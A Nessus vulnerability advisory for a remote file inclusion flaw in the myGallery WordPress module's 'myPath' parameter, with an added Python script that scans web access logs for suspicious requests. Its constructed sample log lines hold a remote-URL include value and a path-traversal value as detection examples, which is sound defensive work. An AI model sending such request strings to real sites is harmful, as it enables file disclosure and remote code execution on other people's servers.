myGallery mygallerybrowser.php 'myPath' Parameter Remote File Inclusion

high Nessus Plugin ID 25116

Synopsis

The remote web server contains a PHP script that is affected by a remote file include vulnerability.

Description

The third-party myGallery module for WordPress installed on the remote host fails to sanitize input to the 'myPath' parameter of the '/mygallery/myfunctions/mygallerybrowser.php' script before using it to include PHP code. An unauthenticated attacker can exploit this issue to view arbitrary files on the remote host or possibly to execute arbitrary PHP code, perhaps from third-party hosts.

Note that exploitation of this issue does not require that PHP's 'register_globals' setting be enabled.
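To check whether the script has already been requested with a client-supplied 'myPath' value, web server access logs can be reviewed. The following is an added example, not part of the Nessus plugin or of myGallery; it assumes combined-format access logs, and the sample log lines, addresses and the '/wp-content/plugins' prefix are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path and parameter name as given in the advisory above.
SCRIPT_SUFFIX = "/mygallery/myfunctions/mygallerybrowser.php"
PARAM = "myPath"
# Assumption: combined log format, client address first, request line in quotes.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(value):
    """Label a decoded myPath value by the kind of include target it names."""
    if re.match(r"^[a-zA-Z][a-zA-Z0-9+.-]*://", value):
        return "remote-url"
    if "../" in value or "..\\" in value:
        return "traversal"
    if value.startswith("/") or re.match(r"^[a-zA-Z]:[\\/]", value):
        return "absolute-path"
    return "other"

def find_mypath_requests(lines):
    """Return (client, status, kind, value) for each request that sets myPath on the script."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        # Compare case-insensitively: the web root may sit on a case-insensitive file system.
        if not url.path.lower().endswith(SCRIPT_SUFFIX):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            hits.append((client, int(status), classify(value), value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [30/Apr/2007:10:00:00 +0000] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http%3A%2F%2Fexample.invalid%2Finc.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [30/Apr/2007:10:01:00 +0000] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2Fconstructed%2Ffile HTTP/1.1" 200 128',
    '192.0.2.12 - - [30/Apr/2007:10:02:00 +0000] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php HTTP/1.1" 200 900',
    '192.0.2.13 - - [30/Apr/2007:10:03:00 +0000] "GET /index.php?p=12 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in find_mypath_requests(SAMPLE):
        print(hit)
```

A 'myPath' value sent in a POST body is not recorded in access logs, so this review only covers values passed in the query string.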

Solution

Upgrade to myGallery version 1.4b5 or later.

See Also

https://www.wildbits.de/2007/04/29/sicherheitsluecke-in-mygallery/

Plugin Details

Severity: High

ID: 25116

File Name: mygallery_mypath_file_include.nasl

Version: 1.20

Type: remote

Family: CGI abuses

Published: 4/30/2007

Updated: 1/19/2021

Supported Sensors: Nessus

Risk Information

VPR

Risk Factor: High

Score: 7.0

CVSS v2

Risk Factor: High

Base Score: 7.5

Temporal Score: 6.4

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Information

CPE: cpe:/a:wordpress:wordpress

Required KB Items: installed_sw/WordPress, www/PHP

Exploit Available: true

Exploit Ease: Exploits are available

Vulnerability Publication Date: 4/29/2007

Exploitable With

CANVAS (CANVAS)

Reference Information

CVE: CVE-2007-2426

BID: 23702